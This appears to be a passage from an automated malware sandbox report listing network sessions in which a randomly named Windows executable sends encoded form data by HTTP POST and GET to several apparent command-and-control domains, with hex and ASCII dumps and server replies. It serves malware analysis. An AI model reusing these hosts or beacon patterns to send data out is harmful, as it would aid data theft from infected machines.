                Data Raw: 68 48 3d 6b 6a 62 4b 76 56 48 4f 2f 4f 75 46 54 47 74 4c 4e 54 58 2b 4a 55 4c 30 75 43 2f 38 64 52 4a 6a 4a 4f 2b 2f 52 6a 44 48 51 65 75 41 4d 54 67 4d 34 68 69 69 47 64 54 65 77 36 78 34 2b 52 7a 75 37 51 33 4c 46 67 69 71 5a 44 39 52 30 6f 79 75 6c 38 53 6d 50 38 4d 39 59 69 4d 67 4e 48 54 74 37 59 4e 54 73 39 65 42 37 30 30 67 36 6d 33 34 30 72 70 44 4b 58 51 61 43 2b 76 72 59 62 71 74 70 74 2f 69 50 78 4c 56 6f 61 51 4d 6c 56 6d 36 63 72 37 75 4b 59 66 62 54 59 50 48 67 64 66 2f 49 77 6d 42 6f 4c 70 63 31 6c 75 59 30 77 63 53 56 54 45 77 57 75 6c 44 52 66 69 6b 35 78 32 4e 54 7a 71 71 68 43 68 69 31 37 65 70 44 68 30 6a 4e 67 3d 3d
                Data Ascii: hH=kjbKvVHO/OuFTGtLNTX+JUL0uC/8dRJjJO+/RjDHQeuAMTgM4hiiGdTew6x4+Rzu7Q3LFgiqZD9R0oyul8SmP8M9YiMgNHTt7YNTs9eB700g6m340rpDKXQaC+vrYbqtpt/iPxLVoaQMlVm6cr7uKYfbTYPHgdf/IwmBoLpc1luY0wcSVTEwWulDRfik5x2NTzqqhChi17epDh0jNg==
                Jul 3, 2024 08:55:43.189490080 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:55:43 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                31192.168.2.94974591.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:45.087466002 CEST1768OUTPOST /dmjt/ HTTP/1.1
                Host: www.fungusbus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.fungusbus.com
                Referer: http://www.fungusbus.com/dmjt/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 6b 6a 62 4b 76 56 48 4f 2f 4f 75 46 54 47 74 4c 4e 54 58 2b 4a 55 4c 30 75 43 2f 38 64 52 4a 6a 4a 4f 2b 2f 52 6a 44 48 51 65 32 41 4e 6c 55 4d 35 43 36 69 48 64 54 65 35 61 78 35 2b 52 79 72 37 51 65 43 46 68 65 63 5a 42 31 52 75 4c 36 75 68 34 2b 6d 46 38 4d 39 55 43 4d 6a 44 6e 54 34 37 59 39 58 73 2b 32 42 37 30 30 67 36 6b 2f 34 67 4a 52 44 49 58 51 5a 53 75 76 5a 50 72 71 4a 70 70 54 59 50 78 4f 33 6f 75 63 4d 6b 31 57 36 50 70 54 75 58 6f 66 5a 65 34 4f 45 67 64 6a 73 49 77 72 79 6f 49 31 69 31 69 61 59 6e 56 68 64 43 6a 46 6f 49 2b 78 54 47 39 61 43 78 47 32 61 4b 79 72 54 33 52 6b 59 6d 35 48 48 57 43 42 39 51 31 66 4a 41 55 36 2b 78 35 30 51 6d 50 2b 46 32 6e 58 6e 75 56 5a 69 46 6e 48 6c 4f 2b 34 61 41 2b 38 66 58 34 76 73 55 65 66 67 48 41 78 46 6e 37 65 46 53 2b 74 39 5a 7a 49 4c 75 61 75 68 42 4f 49 34 43 78 37 44 64 45 67 6b 4a 6e 45 4c 61 6a 61 7a 65 32 6b 53 54 4a 64 58 68 70 61 4e 53 76 77 54 65 6d 56 59 5a 65 45 55 30 74 44 6f 63 53 54 4b 6c 30 74 44 73 67 37 4c 64 47 50 [TRUNCATED]
                Data Ascii: hH=kjbKvVHO/OuFTGtLNTX+JUL0uC/8dRJjJO+/RjDHQe2ANlUM5C6iHdTe5ax5+Ryr7QeCFhecZB1RuL6uh4+mF8M9UCMjDnT47Y9Xs+2B700g6k/4gJRDIXQZSuvZPrqJppTYPxO3oucMk1W6PpTuXofZe4OEgdjsIwryoI1i1iaYnVhdCjFoI+xTG9aCxG2aKyrT3RkYm5HHWCB9Q1fJAU6+x50QmP+F2nXnuVZiFnHlO+4aA+8fX4vsUefgHAxFn7eFS+t9ZzILuauhBOI4Cx7DdEgkJnELajaze2kSTJdXhpaNSvwTemVYZeEU0tDocSTKl0tDsg7LdGPkGjSLRgJ91QxeBdsbnBjkq+c7eoGdmm9s7eNlbDe5tpXmrMoVJS5x3/vZlQuE8MPZcCR44Qe0Mm8urBenFgJJz6eqKj8yPYhDSDtok12sEcAsZgaY6RaQF+hpX28T3NnLcODLMR1WwfL89ByxQBkT7x9AZLBY/DF7pXn7QGd9+lj7EzlrjWdem4IYX8qt/9B7CLVGgEa6/0hGeZqdulaxIP5jL7YB1qCNAbKAUnUTfb0p8+F8bK4F4E90DCvQq0TNdfPWOqXebdH50Kk+98DbhqxN+D7EHUdS5YkBlnG+AMsa4zZm/2lznDTRu8Mg69Z2WILk2uniOeqeMbWIoNQ1ApXYFkDtboiIWaEKHnTE28qeG8I2Io22F78ZwQ/g4ScINjhNzHBZrcjLkRzSipXcLlFimfB+Y6fyqocav5H7Kt48jUL1PoPpoUHKkOljuYdTLwkrQEVwOMXjvHFMdmDI3h8HwjcwyglIkMHH8vE+UuCSTfJwK22r3pXangVEaUHrqzC1DGgbsw3sQRzp20NIOPjQK0WRuIKnIn9F8LWqFIxzr9EeGxKNLUcolusO5YKz7MeQMTt7f8tPsXItkglE7pU7jrhegfX7F8feL9Z5Yj1GN5IPL9zqumbVhHKEoUhzavRqMkoM4MOOhQuniJP06NvGcfVJUAH4v [TRUNCATED]
                Jul 3, 2024 08:55:45.743979931 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:55:45 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                32192.168.2.94974691.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:47.620908976 CEST471OUTGET /dmjt/?hH=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnDtcmXgVOIWaf4rR9wPyv60N+q1PahQ==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.fungusbus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:48.411839962 CEST113INHTTP/1.1 439
                date: Wed, 03 Jul 2024 06:55:48 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                33192.168.2.94974747.239.13.172801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:02.093267918 CEST731OUTPOST /2dv8/ HTTP/1.1
                Host: www.qe1jqiste.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.qe1jqiste.sbs
                Referer: http://www.qe1jqiste.sbs/2dv8/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 6b 75 75 41 64 6e 49 68 37 33 4b 59 4f 6e 45 78 6d 56 47 52 39 31 31 59 50 48 67 42 6b 39 64 55 32 6e 59 65 69 54 62 45 2b 75 31 70 41 42 45 63 6b 4f 64 31 6c 6b 6a 33 62 30 72 74 47 68 67 33 48 2f 6f 4e 61 2f 6f 74 50 4e 79 30 6d 71 6f 4e 74 31 6d 4c 35 71 41 67 50 44 78 67 44 74 6c 50 6c 50 4a 50 70 43 2b 65 49 35 63 2b 78 2f 6e 6c 77 38 68 36 44 33 48 39 69 71 70 38 31 39 54 37 53 73 34 66 7a 41 30 72 52 2f 68 6e 6a 6a 53 76 67 55 66 58 4c 67 46 39 46 43 48 30 61 68 38 2f 42 50 4a 30 48 47 32 43 32 4d 2f 77 6d 70 44 63 52 48 7a 68 46 6b 70 53 34 74 63 2f
                Data Ascii: hH=kuuAdnIh73KYOnExmVGR911YPHgBk9dU2nYeiTbE+u1pABEckOd1lkj3b0rtGhg3H/oNa/otPNy0mqoNt1mL5qAgPDxgDtlPlPJPpC+eI5c+x/nlw8h6D3H9iqp819T7Ss4fzA0rR/hnjjSvgUfXLgF9FCH0ah8/BPJ0HG2C2M/wmpDcRHzhFkpS4tc/
                Jul 3, 2024 08:56:03.085141897 CEST165INHTTP/1.1 405 Not Allowed
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:02 GMT
                Content-Type: text/html
                Content-Length: 2
                Connection: close
                ETag: "660279db-2"
                Data Raw: 31 0a
                Data Ascii: 1


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                34192.168.2.94974847.239.13.172801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:04.638586998 CEST755OUTPOST /2dv8/ HTTP/1.1
                Host: www.qe1jqiste.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.qe1jqiste.sbs
                Referer: http://www.qe1jqiste.sbs/2dv8/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 6b 75 75 41 64 6e 49 68 37 33 4b 59 63 7a 34 78 6b 32 75 52 71 46 31 62 45 6e 67 42 74 64 64 51 32 6e 55 65 69 53 66 55 2b 62 6c 70 42 6a 4d 63 32 2f 64 31 6d 6b 6a 33 55 55 71 6c 4c 42 68 35 48 2f 30 2f 61 36 51 74 50 4e 32 30 6d 75 6b 4e 74 43 4b 4d 34 36 41 69 45 6a 78 69 63 39 6c 50 6c 50 4a 50 70 43 71 6b 49 35 45 2b 78 50 33 6c 78 5a 64 35 41 33 48 2b 6c 71 70 38 78 39 54 2f 53 73 35 4b 7a 46 52 47 52 36 6c 6e 6a 6e 61 76 6a 42 2f 55 42 67 46 2f 42 43 47 71 54 77 46 70 43 2b 41 75 50 51 2b 4c 67 75 54 50 6c 49 6a 43 41 31 36 36 51 7a 70 31 2f 4b 56 58 69 37 71 58 31 58 72 52 47 4c 4a 43 6e 69 2b 36 33 69 43 32 42 51 3d 3d
                Data Ascii: hH=kuuAdnIh73KYcz4xk2uRqF1bEngBtddQ2nUeiSfU+blpBjMc2/d1mkj3UUqlLBh5H/0/a6QtPN20mukNtCKM46AiEjxic9lPlPJPpCqkI5E+xP3lxZd5A3H+lqp8x9T/Ss5KzFRGR6lnjnavjB/UBgF/BCGqTwFpC+AuPQ+LguTPlIjCA166Qzp1/KVXi7qX1XrRGLJCni+63iC2BQ==
                Jul 3, 2024 08:56:05.551534891 CEST165INHTTP/1.1 405 Not Allowed
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:05 GMT
                Content-Type: text/html
                Content-Length: 2
                Connection: close
                ETag: "660279db-2"
                Data Raw: 31 0a
                Data Ascii: 1


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                35192.168.2.94974947.239.13.172801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:07.189765930 CEST1768OUTPOST /2dv8/ HTTP/1.1
                Host: www.qe1jqiste.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.qe1jqiste.sbs
                Referer: http://www.qe1jqiste.sbs/2dv8/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 6b 75 75 41 64 6e 49 68 37 33 4b 59 63 7a 34 78 6b 32 75 52 71 46 31 62 45 6e 67 42 74 64 64 51 32 6e 55 65 69 53 66 55 2b 62 74 70 41 57 41 63 6e 73 31 31 6e 6b 6a 33 5a 30 71 6b 4c 42 68 30 48 2f 39 32 61 36 56 51 50 50 2b 30 6b 4c 34 4e 6b 54 4b 4d 79 36 41 69 4c 44 78 6a 44 74 6b 58 6c 50 5a 44 70 43 36 6b 49 35 45 2b 78 4a 62 6c 30 38 68 35 4e 58 48 39 69 71 70 77 31 39 54 62 53 73 78 61 7a 45 52 77 52 4f 52 6e 69 48 4b 76 68 31 66 55 43 41 46 68 47 43 47 69 54 78 34 33 43 2b 4e 66 50 51 6a 6b 67 74 44 50 32 73 44 55 61 47 4b 56 4a 31 68 6c 70 49 78 4d 37 62 2b 7a 74 30 43 61 48 76 74 2f 34 43 44 39 6a 42 76 45 62 53 4d 6f 6b 67 38 65 36 6e 2b 42 51 4a 2f 4d 6a 51 68 44 4f 6b 4f 47 68 61 70 46 42 35 5a 69 64 71 35 6a 34 45 62 58 4a 58 78 77 45 68 65 36 45 41 6c 50 66 39 68 4e 74 2f 31 65 39 4c 77 4e 53 75 70 55 44 7a 73 6f 62 4b 73 4b 6b 37 58 61 74 79 4d 69 6b 4e 70 65 57 41 4e 51 33 6e 41 53 31 44 35 6f 69 67 58 6d 33 6d 74 65 6a 4b 57 4b 69 31 4f 35 71 36 65 42 35 31 6d 6d 62 44 78 [TRUNCATED]
                Data Ascii: hH=kuuAdnIh73KYcz4xk2uRqF1bEngBtddQ2nUeiSfU+btpAWAcns11nkj3Z0qkLBh0H/92a6VQPP+0kL4NkTKMy6AiLDxjDtkXlPZDpC6kI5E+xJbl08h5NXH9iqpw19TbSsxazERwRORniHKvh1fUCAFhGCGiTx43C+NfPQjkgtDP2sDUaGKVJ1hlpIxM7b+zt0CaHvt/4CD9jBvEbSMokg8e6n+BQJ/MjQhDOkOGhapFB5Zidq5j4EbXJXxwEhe6EAlPf9hNt/1e9LwNSupUDzsobKsKk7XatyMikNpeWANQ3nAS1D5oigXm3mtejKWKi1O5q6eB51mmbDxOjHyPRi8HQom61tUHuGHuZJhuT9s4/jTcJUm+s6IGf31YwHzdApBfRv6/gsUHfUF2JgqcgkFxhXx7kVnabCgL9aeoPrfETffHG1VGt84kfRrLdj2tbJfg+QzicgL04qSz2K3zOU50qd8gKMyNzowqOd1kbjqsGZjK39w1y9JtmndCBUCcVcpFKWlYCXMMLArzlweua9UM+X2cm8AFBbWrFElgOTfsi1uZ5aDoWWeJfiv/L9TYWK//K8ln32ZPN2IqEIXRHQ+oKfzM9Tr5niXvJgJ8VOS+RVBLTu4dbQhIH8iyPR/OYHcikVW2GkB0UjIfOBAPoqfwAQc8HdT0y/nB8IoLO1sczEvLlMKdM3vV8vPAGMRoJZKovwQ4toiiuQ1IkhfVt+05JMlnUqMD6S5tGeSQ3LS/8F4lofAp3nlAZ1N92jjRfpl9v+hxB9WGdYopuK44kP/cl7EEWNLBYWMsqQcJAPnb4McFa8kGrFYLXV1qC+3OfmP/Q7rnle6FX1VJ3rg7GI8X8VTyCwIfs8tMZtJtsiWdLVmZisv0EUSZElLU3p9rfvsgruCW4iZFZ2g9gSlyKrj4dnMCbhE897Jf/8qryciq/awD6qdbyJXpdnUT7HqgxmtCEsHtRD+H+5Cisyd/jEfnynfPqx11TqK+GCJAMJlK70m3p [TRUNCATED]
                Jul 3, 2024 08:56:08.322679043 CEST165INHTTP/1.1 405 Not Allowed
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:07 GMT
                Content-Type: text/html
                Content-Length: 2
                Connection: close
                ETag: "660279db-2"
                Data Raw: 31 0a
                Data Ascii: 1


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                36192.168.2.94975047.239.13.172801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:09.881717920 CEST471OUTGET /2dv8/?hH=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX26bwEMBx8euROh9Q+/yWsNbYiwZzEkA==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.qe1jqiste.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:10.748578072 CEST224INHTTP/1.1 200 OK
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:10 GMT
                Content-Type: text/html
                Content-Length: 2
                Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT
                Connection: close
                ETag: "660279db-2"
                Accept-Ranges: bytes
                Data Raw: 31 0a
                Data Ascii: 1


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                37192.168.2.949751208.91.197.27801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:16.022083044 CEST755OUTPOST /n12h/ HTTP/1.1
                Host: www.thesprinklesontop.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.thesprinklesontop.com
                Referer: http://www.thesprinklesontop.com/n12h/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 63 4a 54 76 4e 31 57 74 65 47 6f 4b 56 45 45 39 64 35 5a 30 74 5a 35 43 49 71 74 4b 59 52 42 35 4f 69 34 78 44 70 2f 66 31 30 45 79 5a 38 4f 57 75 50 61 56 48 6a 55 6f 6c 79 75 61 58 74 4d 46 6e 79 71 61 72 61 4b 4d 6d 55 6f 65 4b 59 73 65 32 64 63 46 6f 7a 49 39 39 69 2f 4c 34 65 52 33 7a 51 53 7a 37 38 36 57 62 59 51 55 55 6c 58 37 75 33 2b 33 68 69 68 38 49 51 6e 35 66 48 4d 43 59 68 70 30 67 78 5a 68 57 70 66 73 6f 65 68 4d 6b 42 57 2b 46 2f 48 48 50 6b 61 44 38 44 56 70 73 53 59 76 6c 35 6a 53 51 34 46 75 68 56 69 73 4b 4c 4e 39 74 68 69 78 50 63 7a 77
                Data Ascii: hH=cJTvN1WteGoKVEE9d5Z0tZ5CIqtKYRB5Oi4xDp/f10EyZ8OWuPaVHjUolyuaXtMFnyqaraKMmUoeKYse2dcFozI99i/L4eR3zQSz786WbYQUUlX7u3+3hih8IQn5fHMCYhp0gxZhWpfsoehMkBW+F/HHPkaD8DVpsSYvl5jSQ4FuhVisKLN9thixPczw


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                38192.168.2.949752208.91.197.27801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:18.562242985 CEST779OUTPOST /n12h/ HTTP/1.1
                Host: www.thesprinklesontop.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.thesprinklesontop.com
                Referer: http://www.thesprinklesontop.com/n12h/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 63 4a 54 76 4e 31 57 74 65 47 6f 4b 55 6b 55 39 52 36 68 30 36 70 35 4e 44 4b 74 4b 57 78 42 69 4f 69 30 78 44 6f 37 31 31 43 30 79 5a 59 4b 57 76 4f 61 56 43 6a 55 6f 69 43 75 56 4a 64 4d 30 6e 79 33 36 72 62 61 4d 6d 55 4d 65 4b 59 63 65 6a 2b 30 47 71 6a 49 37 78 43 2f 4e 6c 4f 52 33 7a 51 53 7a 37 38 75 38 62 59 34 55 55 56 6e 37 38 6a 69 32 67 69 68 37 50 51 6e 35 62 48 4d 47 59 68 70 61 67 30 34 4b 57 72 58 73 6f 61 70 4d 6b 54 2b 39 4b 2f 47 43 43 45 62 55 38 6d 77 39 30 6a 64 33 72 71 33 71 45 4a 4e 30 72 55 43 79 62 35 45 6d 34 32 69 57 49 37 36 59 6f 7a 43 4e 4b 6a 32 59 44 62 36 39 65 45 2f 65 2f 5a 5a 55 62 77 3d 3d
                Data Ascii: hH=cJTvN1WteGoKUkU9R6h06p5NDKtKWxBiOi0xDo711C0yZYKWvOaVCjUoiCuVJdM0ny36rbaMmUMeKYcej+0GqjI7xC/NlOR3zQSz78u8bY4UUVn78ji2gih7PQn5bHMGYhpag04KWrXsoapMkT+9K/GCCEbU8mw90jd3rq3qEJN0rUCyb5Em42iWI76YozCNKj2YDb69eE/e/ZZUbw==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                39192.168.2.949753208.91.197.27801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:56:21.103302956 CEST1792OUTPOST /n12h/ HTTP/1.1
                Host: www.thesprinklesontop.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.thesprinklesontop.com
                Referer: http://www.thesprinklesontop.com/n12h/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 63 4a 54 76 4e 31 57 74 65 47 6f 4b 55 6b 55 39 52 36 68 30 36 70 35 4e 44 4b 74 4b 57 78 42 69 4f 69 30 78 44 6f 37 31 31 42 55 79 61 74 65 57 75 74 79 56 46 6a 55 6f 74 53 75 46 4a 64 4d 70 6e 79 76 6c 72 65 43 63 6d 57 6b 65 49 37 55 65 79 76 30 47 6a 6a 49 37 35 69 2f 4d 34 65 51 6a 7a 51 43 33 37 38 2b 38 62 59 34 55 55 54 72 37 73 48 2b 32 69 69 68 38 49 51 6e 39 66 48 4e 5a 59 69 5a 73 67 30 31 78 56 59 50 73 70 37 56 4d 6e 6e 65 39 44 2f 47 41 46 45 62 63 38 6d 30 4c 30 6a 51 47 72 70 72 45 45 4f 68 30 72 51 48 37 45 39 64 77 76 41 36 34 65 38 53 5a 76 30 4b 75 53 7a 62 67 43 2b 69 38 50 32 57 76 71 36 4d 65 41 2f 32 51 77 57 67 77 71 4d 69 6b 38 54 4f 50 54 6b 41 4f 65 39 36 2b 49 7a 4d 6c 61 55 56 2f 4e 6b 4a 71 4b 53 31 6b 42 66 76 53 6b 66 61 4e 62 32 51 49 5a 57 63 4e 59 54 50 74 46 59 72 70 38 39 65 6e 2b 65 49 77 65 42 59 78 51 76 69 6f 49 4e 68 45 73 44 73 31 37 4c 69 64 4b 54 70 38 6a 59 42 68 56 49 37 51 78 2f 6e 57 33 43 48 57 6d 59 41 32 6c 7a 54 4c 31 57 2b 53 33 37 2b [TRUNCATED]
                Data Ascii: hH=cJTvN1WteGoKUkU9R6h06p5NDKtKWxBiOi0xDo711BUyateWutyVFjUotSuFJdMpnyvlreCcmWkeI7Ueyv0GjjI75i/M4eQjzQC378+8bY4UUTr7sH+2iih8IQn9fHNZYiZsg01xVYPsp7VMnne9D/GAFEbc8m0L0jQGrprEEOh0rQH7E9dwvA64e8SZv0KuSzbgC+i8P2Wvq6MeA/2QwWgwqMik8TOPTkAOe96+IzMlaUV/NkJqKS1kBfvSkfaNb2QIZWcNYTPtFYrp89en+eIweBYxQvioINhEsDs17LidKTp8jYBhVI7Qx/nW3CHWmYA2lzTL1W+S37+As+hzhIbsngOABh+ch/n81aphZWT/rYr0xsV1cB3hxLABZDn0BvQI365Q/AVQKs7TvYsURL3DPdFUpNyhr0qgCB+HDtKMh8pTrBKJfW4oFVJ6GpJT83oGKaQ6W8jKQZeAk2HAKOLB7kG7GnIOE7csMvoFxAZSDOj0SRnxpVMnFwBFtoSKk5wvTyLIQR5zZTg6RkRMpgn237uJe15zSm38BCrdzl2lVjdUWNpV5G54etRAZvNm/kW/39OBYFP8NlRpDcUKnYJeFRlch09TaWEVTd3L6Znkw/D6u/4qYwJLCiL4xtWw+v4BPW5fZMsRitdzYOD2lybYLQ/KQ0nMTY7fw9BQ9+ouuxjJh7URwUdQEiugTHtqaHynky++FiR7XEspgGtbWffoClCpEyWUnI6JHMY+/GdpM/mK9ZeiDCE/dd3+ceeThr6LqBR6oqeIwqzl0u9D4Yis7rsLE3sNno1v1cP5mKFrQ4wj0v9B1187H3FTzuVJ4mZpIVSOkxI8I92BMb8hMGIQdZH6jqT1WOsIKp4/eMFpoq9K8jWgU8wFmXtKj9+9YIgGDqHGRmoZmjOqB4FfE/XXiFKQ3A6M1GFC3hzjwASpy2dAmbhb7oAeLhFZjxG1ZohrZsPiJ00pZQ4o17YyFtEkZmRMAVM7bfzsfeKf7CyM0SX4s [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
